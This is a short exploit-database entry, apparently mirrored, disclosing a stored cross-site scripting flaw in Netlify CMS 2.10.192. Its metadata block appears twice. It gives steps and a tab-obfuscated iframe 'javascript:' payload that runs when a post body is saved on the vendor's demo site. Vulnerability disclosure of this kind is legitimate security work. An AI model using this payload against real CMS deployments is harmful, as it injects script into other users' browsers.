Netlify CMS 2.10.192 - Stored Cross-Site Scripting (XSS)
Author: tmrswrr
type: webapps
platform: java
port:
date_added: 2023-07-11
date_updated: 2023-07-15
verified: 1
codes:
tags:
aliases:
screenshot_url:
application_url:
raw file: 51576.txt
type: webapps
platform: java
port:
date_added: 2023-07-11
date_updated: 2023-07-15
verified: 1
codes:
tags:
aliases:
screenshot_url:
application_url:
raw file: 51576.txt
# Exploit Title: Netlify CMS 2.10.192 - Stored Cross-Site Scripting (XSS) # Exploit Author: tmrswrr # Vendor Homepage: https://decapcms.org/docs/intro/ # Software Link: https://github.com/decaporg/decap-cms # Version: 2.10.192 # Tested on: https://cms-demo.netlify.com Description: 1. Go to new post and write body field your payload: https://cms-demo.netlify.com/#/collections/posts Payload = <iframe src=java	sc	ript:al	ert()></iframe> 2. After save it XSS payload will executed and see alert box
Copyright © 2024 Irfan TOOR all rights reserved.